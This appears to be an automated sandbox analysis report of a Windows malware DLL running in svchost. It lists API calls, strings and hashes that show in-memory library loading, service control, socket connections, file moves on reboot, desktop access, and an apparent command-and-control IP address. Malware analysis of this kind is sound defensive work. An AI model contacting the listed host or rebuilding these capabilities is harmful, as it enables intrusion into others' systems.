                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 1000476E
                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 10004779
                                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 100047B1
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 100047D0
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 100047DB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
                                                                                          • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?,?,?,?,1000397D), ref: 10003BC4
                                                                                          • GetProcAddress.KERNEL32(00000000,IsBadReadPtr), ref: 10003BD3
                                                                                          • LoadLibraryA.KERNEL32(?,?,?,?,1000397D), ref: 10003C0D
                                                                                          • realloc.MSVCRT ref: 10003C2C
                                                                                          • GetProcAddress.KERNEL32(?,?), ref: 10003C85
                                                                                          • FreeLibrary.KERNEL32(?,1000397D), ref: 10003CC7
                                                                                          Similarity
                                                                                          • API ID: Library$AddressLoadProc$Freerealloc
                                                                                          • String ID: IsBadReadPtr$kernel32.dll
                                                                                          APIs
                                                                                          • memcpy.MSVCRT(?,?,00000170), ref: 100029D2
                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 10002A05
                                                                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10002A28
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 10002A3A
                                                                                          • strlen.MSVCRT ref: 10002A47
                                                                                          • wsprintfA.USER32 ref: 10002A6B
                                                                                          • lstrcpyA.KERNEL32(?,?), ref: 10002A84
                                                                                            • Part of subcall function 100027BC: memset.MSVCRT ref: 100027D8
                                                                                            • Part of subcall function 100027BC: strrchr.MSVCRT ref: 100027E2
                                                                                            • Part of subcall function 100027BC: strrchr.MSVCRT ref: 10002811
                                                                                            • Part of subcall function 100027BC: strlen.MSVCRT ref: 10002821
                                                                                            • Part of subcall function 100027BC: strncpy.MSVCRT ref: 1000283B
                                                                                            • Part of subcall function 100027BC: memset.MSVCRT ref: 10002889
                                                                                            • Part of subcall function 100027BC: wsprintfA.USER32 ref: 100028A4
                                                                                            • Part of subcall function 100027BC: memset.MSVCRT ref: 100028B3
                                                                                          Similarity
                                                                                          • API ID: memset$Filestrlenstrrchrwsprintf$CloseCreateHandleWritelstrcpymemcpystrncpy
                                                                                          • String ID: %s %s
                                                                                          APIs
                                                                                          • strlen.MSVCRT ref: 10002C9F
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 10002CB3
                                                                                          • memcpy.MSVCRT(00000000,?,00000001,00000001), ref: 10002CBF
                                                                                          • strrchr.MSVCRT ref: 10002CC7
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10002D27
                                                                                            • Part of subcall function 10004529: LoadLibraryA.KERNEL32(wininet.dll,?,00000001,00000000), ref: 1000454D
                                                                                            • Part of subcall function 10004529: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 10004564
                                                                                            • Part of subcall function 10004529: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 1000457E
                                                                                            • Part of subcall function 10004529: FreeLibrary.KERNEL32(00000000,?,00000001,00000000), ref: 1000459C
                                                                                            • Part of subcall function 1000248B: GetFileAttributesA.KERNEL32(00000001,10002CE8,00000001), ref: 1000248F
                                                                                            • Part of subcall function 1000248B: GetLastError.KERNEL32 ref: 1000249A
                                                                                          • CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002D18
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$??2@??3@AttributesCreateErrorFileFreeLastLoadProcessmemcpystrlenstrrchr
                                                                                          • String ID: D$WinSta0\Default
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(user32.dll,?,?,00000000,?,00000000,Function_00004CE2,10005170,000000FF,?,100042CA,00000000), ref: 1000448F
                                                                                          • GetProcAddress.KERNEL32(00000000,OpenInputDesktop), ref: 100044A4
                                                                                          • GetProcAddress.KERNEL32(00000000,OpenDesktopA), ref: 100044B0
                                                                                          • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 100044BC
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                          • String ID: CloseDesktop$OpenDesktopA$OpenInputDesktop$user32.dll
                                                                                          APIs
                                                                                          • printf.MSVCRT ref: 1000240A
                                                                                            • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038D8
                                                                                            • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038E8
                                                                                            • Part of subcall function 1000389D: GetProcessHeap.KERNEL32(00000000,00000014,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C), ref: 100038F9
                                                                                            • Part of subcall function 1000389D: HeapAlloc.KERNEL32(00000000,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C,?), ref: 10003900
                                                                                            • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003924
                                                                                            • Part of subcall function 1000389D: VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003933
                                                                                            • Part of subcall function 1000389D: memcpy.MSVCRT(00000000,?,?,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?), ref: 10003944
                                                                                          • OutputDebugStringA.KERNEL32(Can't load library from memory.,?,?,1000234E,?,10006E5C,?,00000000,00000000,?,?), ref: 10002421
                                                                                          • printf.MSVCRT ref: 1000244D
                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10002462
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual$Heapprintf$DebugFreeOutputProcessStringmemcpy
                                                                                          • String ID: Can't load library from memory.$LoadFromMemory $LoadFromMemory END---$PluginMe
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(?,00000104), ref: 100020E5
                                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100020F3
                                                                                          • GetTickCount.KERNEL32 ref: 100020F9
                                                                                          • wsprintfA.USER32 ref: 10002113
                                                                                          • MoveFileA.KERNEL32(?,?), ref: 1000212A
                                                                                          • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000213B
                                                                                          Similarity
                                                                                          • API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
                                                                                          • String ID: %s\%d.bak
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00000144,00000000,?,?,100037E0), ref: 10003676
                                                                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1000368E
                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 10003698
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 100036AC
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$FreeLoad
                                                                                          • String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
                                                                                          • API String ID: 2256533930-2522683910
                                                                                          • Opcode ID: 34a6eaa16ec599896768d47b9751df638f2169115c1a8e10c5d2607526b1ef77
                                                                                          • Instruction ID: ef67112214a51d6d1f3e9f06108ff16868adfdb602b3d8d3b658392e0a076cbe
                                                                                          • Opcode Fuzzy Hash: 34a6eaa16ec599896768d47b9751df638f2169115c1a8e10c5d2607526b1ef77
                                                                                          • Instruction Fuzzy Hash: CBF0A072A00314BBF701D7E58C98DAF7BBCDB886D1B104019FA00A3208DB739D0189B5
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000064), ref: 10002279
                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10002323
                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 10002336
                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 10002371
                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 10002384
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocVirtualmemcpy$Sleep
                                                                                          • String ID: GW2$SGSWh5-$SPh\n
                                                                                          • API String ID: 1263862976-685354651
                                                                                          • Opcode ID: 3d25bdad23a031e0b48f737afd54ec3eb76eea0dcd6b60b485997711385254f5
                                                                                          • Instruction ID: 2f54f0f1129bbba38d4c41c0db51b56afb961a9339435d6967ffbe2678c67ccd
                                                                                          • Opcode Fuzzy Hash: 3d25bdad23a031e0b48f737afd54ec3eb76eea0dcd6b60b485997711385254f5
                                                                                          • Instruction Fuzzy Hash: E241F3B5104244BEF720DFA18CC6F7F7A6CEB457C4F10842AFA894548DCB76AE40A622
                                                                                          APIs
                                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
                                                                                          • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
                                                                                          • Sleep.KERNEL32(0000000A), ref: 10001B2F
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                          • String ID:
                                                                                          • API String ID: 2359367111-0
                                                                                          • Opcode ID: 5fba824a85b92acc79a789ef028bf042a0167ae6a51034b94a07b5d3b0519e81
                                                                                          • Instruction ID: 13eb0d6c039a265936ccbdc891ea19e15248044979c42994c6487f454c48f15c
                                                                                          • Opcode Fuzzy Hash: 5fba824a85b92acc79a789ef028bf042a0167ae6a51034b94a07b5d3b0519e81
                                                                                          • Instruction Fuzzy Hash: 87017531644627ABF7119BA09C89FFF7BBAEF0A7C1F204060FA01D509DEB648542D6A1
                                                                                          APIs
                                                                                            • Part of subcall function 1000180A: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
                                                                                            • Part of subcall function 1000180A: CancelIo.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001838
                                                                                            • Part of subcall function 1000180A: InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
                                                                                            • Part of subcall function 1000180A: closesocket.WS2_32(?), ref: 1000184D
                                                                                            • Part of subcall function 1000180A: SetEvent.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001856
                                                                                          • ResetEvent.KERNEL32(?,00002256,00000000,00000000), ref: 10001458
                                                                                          • socket.WS2_32(00000002,00000001,00000006), ref: 10001469
                                                                                          • gethostbyname.WS2_32(?), ref: 1000147A
                                                                                          • htons.WS2_32(?), ref: 1000148F
                                                                                          • connect.WS2_32(?,00000002,00000010), ref: 100014AC
                                                                                          • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 100014D1
                                                                                          • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 10001502
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
                                                                                          • String ID:
                                                                                          • API String ID: 4281462294-0
                                                                                          • Opcode ID: 3bd37e16282c1c1f21b19040e991c0c37f16a42726fa5d42d22308dc76884aca
                                                                                          • Instruction ID: 8d33707021d861f585806a6466cff3f66270e93c65c897c0ed9a4eea2b4cd3d2
                                                                                          • Opcode Fuzzy Hash: 3bd37e16282c1c1f21b19040e991c0c37f16a42726fa5d42d22308dc76884aca
                                                                                          • Instruction Fuzzy Hash: 9421BD71500719BFE7109FA4CC84EEBBBF9EF09394F104529F602A62A4C7B29D449B20
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 100012D9
                                                                                          • _CxxThrowException.MSVCRT(?,10005258), ref: 10001332
                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 10001343
                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 10001350
                                                                                          • memcpy.MSVCRT(?,00000068,00000003), ref: 10001379
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateEventExceptionH_prologStartupThrowmemcpy
                                                                                          • String ID: hx
                                                                                          • API String ID: 80965288-1695387836
                                                                                          • Opcode ID: 77854b9b63fc0fb3e868ca2b5d078d50e29d64ea9dc30742ffd87570b9eaf05b
                                                                                          • Instruction ID: e29fc32a716e33b2e16fee5429824c3098a31f8f694cb1b228e84ed99c9fd0ff
                                                                                          • Opcode Fuzzy Hash: 77854b9b63fc0fb3e868ca2b5d078d50e29d64ea9dc30742ffd87570b9eaf05b
                                                                                          • Instruction Fuzzy Hash: 8211B4748013849EF710DBA8CD89BEEBBB8DF09384F50005DF141A7286DFB56A08CB62
                                                                                          APIs
                                                                                          Strings
                                                                                          • Rundll32 "%s",DllUpdate %s, xrefs: 10002774
                                                                                          • Rundll32 "%s",Uninstall, xrefs: 10002792
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$ExecFileModuleName
                                                                                          • String ID: Rundll32 "%s",DllUpdate %s$Rundll32 "%s",Uninstall
                                                                                          • API String ID: 4265364758-3622515909
                                                                                          • Opcode ID: 2fae55858e382da93d8a6581f30ac6264c287b13e5b54571d9062f30e9afb438
                                                                                          • Instruction ID: 96afaeef2140f7acea31c6041c278450ca2d3413692d0236748e955fccce9fd0
                                                                                          • Opcode Fuzzy Hash: 2fae55858e382da93d8a6581f30ac6264c287b13e5b54571d9062f30e9afb438
                                                                                          • Instruction Fuzzy Hash: 0FF01875400228AFFB10DB50CC8DFCA777DEB08384F604191F659D2065DBB19698CF91
                                                                                          APIs
                                                                                          • LocalAlloc.KERNEL32(00000040,00000229,?,100022D7,?), ref: 10002616
                                                                                          • memcpy.MSVCRT(00000001,103.36.221.195,00000228,?,100022D7,?), ref: 10002633
                                                                                          • LocalSize.KERNEL32(00000000), ref: 1000263C
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                            • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                            • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                            • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                          • Sleep.KERNEL32(00000001,00000000,00000000), ref: 1000264F
                                                                                          • LocalFree.KERNEL32(00000000), ref: 10002656
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Localmemcpy$??2@??3@$AllocFreeSizeSleep
                                                                                          • String ID: 103.36.221.195
                                                                                          • API String ID: 3084024409-2989038800
                                                                                          • Opcode ID: 2ebc1bcf665d22d67c7a361327471c09cc11f5b44399916a7679a62a2e06e5b5
                                                                                          • Instruction ID: 6c6233c5ed4335591c5831c53d58df47d942e828471bf6846fd26331ce1e1182
                                                                                          • Opcode Fuzzy Hash: 2ebc1bcf665d22d67c7a361327471c09cc11f5b44399916a7679a62a2e06e5b5
                                                                                          • Instruction Fuzzy Hash: 1BE092750036317BF341ABA09C4DFCF3A6DEF097D1F044104FB49A5199CB51564187E6
                                                                                          APIs
                                                                                            • Part of subcall function 100012A4: VirtualFree.KERNEL32(?,00000000,00008000,?,10001878,?,00000144,00000000,1000381E,000000C8,00000144), ref: 100012B6
                                                                                          • ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                          • memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                          • memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                            • Part of subcall function 1000104C: memcpy.MSVCRT(?,00000003,00000003,00000000,?,?,10001947,?,00000003,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001074
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: memcpy$??2@??3@$FreeVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 494799333-0
                                                                                          • Opcode ID: 4ee7b13994a7bebae5ea71dd6d5e065c25e5d167394b36d5181ca15b21c419c8
                                                                                          • Instruction ID: a26a835bd5f016d956b68753e1f5501337bc07bd69db5d8cf19c0b84b9b19e4d
                                                                                          • Opcode Fuzzy Hash: 4ee7b13994a7bebae5ea71dd6d5e065c25e5d167394b36d5181ca15b21c419c8
                                                                                          • Instruction Fuzzy Hash: B631CBB9601204BBFF01EB64DD92FEE77AAEF44380F004019F605A6186DFB4BB149751
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.4119251389.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                          • Associated: 00000004.00000002.4119216710.0000000010000000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4119423178.0000000010005000.00000002.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121279850.0000000010006000.00000004.00000001.01000000.00000007.sdmp
                                                                                          • Associated: 00000004.00000002.4121356871.0000000010007000.00000002.00000001.01000000.00000007.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_10000000_svchost.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _strupr$MessageSendVisibleWindowlstrlenstrstr
                                                                                          APIs
                                                                                          • API ID: FreeLibrary
                                                                                          APIs
                                                                                          Strings
                                                                                          • API ID: strlenwsprintf
                                                                                          • String ID: Group$Remark$SYSTEM\CurrentControlSet\Services\%s$encvbk
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038D8
                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 100038E8
                                                                                          • GetProcessHeap.KERNEL32(00000000,00000014,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C), ref: 100038F9
                                                                                          • HeapAlloc.KERNEL32(00000000,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?,10006E5C,?), ref: 10003900
                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003924
                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E), ref: 10003933
                                                                                          • memcpy.MSVCRT(00000000,?,?,?,759A4CB0,00000000,?,?,?,10002414,?,?,?,?,1000234E,?), ref: 10003944
                                                                                          • API ID: Alloc$Virtual$Heap$Processmemcpy
                                                                                          APIs
                                                                                          • ceil.MSVCRT ref: 10001226
                                                                                          • _ftol.MSVCRT ref: 1000122E
                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,?,10001712,00000003), ref: 10001251
                                                                                          • memcpy.MSVCRT(00000000,?,00000000,?,?,10001712,00000003), ref: 10001275
                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,10001712,00000003), ref: 10001287
                                                                                          • API ID: Virtual$AllocFree_ftolceilmemcpy
                                                                                          APIs
                                                                                          • ceil.MSVCRT ref: 10001187
                                                                                          • _ftol.MSVCRT ref: 1000118F
                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,?,10001947,?,00000003,?,00000144), ref: 100011A3
                                                                                          • API ID: AllocVirtual_ftolceil
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 100013BB
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,10002F56), ref: 100013DD
                                                                                          • CloseHandle.KERNEL32(?,?,10002F56), ref: 100013F3
                                                                                          • CloseHandle.KERNEL32(?,?,10002F56), ref: 100013FC
                                                                                          • WSACleanup.WS2_32 ref: 10001402
                                                                                            • Part of subcall function 1000180A: setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
                                                                                            • Part of subcall function 1000180A: CancelIo.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001838
                                                                                            • Part of subcall function 1000180A: InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
                                                                                            • Part of subcall function 1000180A: closesocket.WS2_32(?), ref: 1000184D
                                                                                            • Part of subcall function 1000180A: SetEvent.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001856
                                                                                          • API ID: CloseHandle$CancelCleanupEventExchangeH_prologInterlockedObjectSingleWaitclosesocketsetsockopt
                                                                                          APIs
                                                                                          • setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 1000182F
                                                                                          • CancelIo.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001838
                                                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 10001844
                                                                                          • closesocket.WS2_32(?), ref: 1000184D
                                                                                          • SetEvent.KERNEL32(?,?,10001455,00002256,00000000), ref: 10001856
                                                                                          • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                          APIs
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10004307
                                                                                          • _beginthreadex.MSVCRT ref: 10004325
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10004335
                                                                                          • CloseHandle.KERNEL32(?), ref: 1000433E
                                                                                          • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                                                                                          • String ID:
                                                                                          • API String ID: 92035984-0
                                                                                          • Opcode ID: 4f24713aeb18b6c8055081ae489e524b02219a3e0fa4e6869f4180a6eb22546b
                                                                                          • Instruction ID: faf95892778ea6415a1c54bed7ea38c560d5af97f962d2801ede21c28746a2bf
                                                                                          • Opcode Fuzzy Hash: 4f24713aeb18b6c8055081ae489e524b02219a3e0fa4e6869f4180a6eb22546b
